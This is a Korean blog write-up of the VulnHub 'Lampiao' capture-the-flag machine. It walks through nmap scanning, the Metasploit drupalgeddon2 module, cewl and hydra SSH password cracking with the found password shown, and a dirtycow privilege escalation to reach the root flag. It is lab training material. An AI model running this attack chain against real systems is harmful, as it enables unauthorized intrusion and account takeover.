Notice
Recent Posts
Recent Comments
Link
일 | 월 | 화 | 수 | 목 | 금 | 토 |
---|---|---|---|---|---|---|
1 | 2 | 3 | 4 | 5 | 6 | 7 |
8 | 9 | 10 | 11 | 12 | 13 | 14 |
15 | 16 | 17 | 18 | 19 | 20 | 21 |
22 | 23 | 24 | 25 | 26 | 27 | 28 |
29 | 30 | 31 |
Tags
- root-me
- DNS 정보수집
- aslr
- openvas
- 필터링 우회
- SQL Injection
- ASCII-Aromor
- MySQL 원격 로그인.
- 배시쉘 버그
- MBSA
- bash shell bug
- Lampiao
- JSP 우회
- msfconsole
- exploit-db
- 메모리 보호
- File Upload-ZIP
- SecureCheq
- shellshock
- 취약점
- Nexpose
- code injection
- GHDB
- file upload
- Canary
- 파일 업로드
- metasploit
- assert()
- ctf
- WHISTL
Archives
- Today
- Total
나만의 연습장
LamPiao - CTF 문제 풀이 본문
!!!경고!!!
본 게시물에는 해킹 기법에 관련한 정보가 포함되어 있습니다.
이를 사용하여 악용할 시에는 법적 문제가 발생할 수 있으며
공격으로 인한 사고에 대해서 작성자는 절대 책임지지 않습니다.
이 페이지를 열함하였다는 것은 이에 동의한 것으로 간주합니다.
제 01장 CTF
1-1. 개요 |
- https://www.vulnhub.com/ 사이트에 들어가서 원하는 CTF 문제를 선택한다.
- 선택한 CTF를 들어가 보면 root를 얻어라라고 한다.
- 밑에 Download를 받는다.
제 01 장 CTF
1-2. 실습 환경 구축 |
- 위에서 받았던 파일의 압축을 VM 폴더에 풀어 놓는다.
- Lampiao.ovf 파일을 선택 하여 VMware로 파일을 열어본다.
실습 환경 구축 |
- firewall
- Kali
- Lampiao
제 02 장 정보 수집
2-1. IP 찾기 (Kali) |
- # netdiscover 라는 명령어를 사용
- 192.168.10.135 라는 IP를 찾을 수 있다.
2-2. 포트번호와 서비스 확인 |
- # nmap -sV -T5 -p 1-65535 192.168.10.135 명령어 사용
- 포트 번호 22, 80, 1898 확인
- 서비스 ssh, http 확인
제 02 장 정보 수집
2-3. http 홈페이지 확인 |
- 열려있는 80포트 접속
제 02 장 정보 수집
2-3 http 홈페이지 확인 |
- 열려있는 1898포트 접속
- 로그인 페이지와 Drupal(드루팔)에 의해 만들어진 것을 알 수 있다.(Powered by Durpal)
제 03장 Drupal Attack
3-1. msfconsole |
- msfconsole 접속
- search Drupal 검색
- exploit/unix/webapp/drupal_drupalgeddon2를 선택하여 공격을 한다.
제 3장 Drupal Attack
3-1. msfconsole |
- RHOST와 RPORT를 설정해준다.
- exploit으로 공격을 한다.
- 192.168.10.135에 접속을 확인 할 수 있다.
제 3장 Drupal Attack
3-2. 정보 수집 |
- getuid로 자신을 확인한다.
- cat /etc/passwd로 사용자들을 확인한다.
제 04 장 패스워드 찾기
4-1. cewl |
(TERM2)
- cewl -m 5 -w wordlist1.txt http://192.168.10.135:1898
- 위에 명령어로 패스워드 크래커에 사용할 수 있는 단어 목록을 반환한다.
제 04 장 패스워드 찾기
4-2. hydra |
(TERM2)
- hydra -l tiago -P wordlist1.txt 192.168.10.135 ssh
- 위에 명령어로 tiago의 사용자의 패스워드를 크래킹 한다.
- 패스워드 Virgulino 확인
제 05장 Lampiao 취약점 찾기
5-1. 정보 수집 |
- ssh tiago@192.168.10.135 위에서 수집한 패스워드로 접속
- cat /etc/&release 로 정보 수집 ( ubuntu 14.04.5 )
- uname -a 로 정보 수집 ( Linux lampiao 4.40-31-generic )
제 5장 Lampiao 취약점 찾기
5-2. exploit-db |
- https://www.exploit-db.com 홈페이지에 들어가서 위에서 수집한 정보를 입력하여 알맞은 공격 툴을 선택한다.
- dirtycow, 2016-11-27을 선택하였다.
- 칼리에 다운받은 공격툴을 scp 명령어로 tiago 홈 디렉토리에 저장한다.
- scp -r root@192.168.10.50:/root/test/40847.cpp /home/tiago
- 40847.cpp을 컴파일한다.
제 6장 root Flag 찾기
6-1. Flag 찾기 |
- ./dcow -s 로 명령을 실행한다.
- 위에 명령어를 사용하면 root사용자로 변한 것을 확인 할 수 있다.
- ls 명령어를 사용하면 flag.txt를 찾을 수 있다.
- cat 명령어로 보면 root의 flag를 찾을 수 있다.
Comments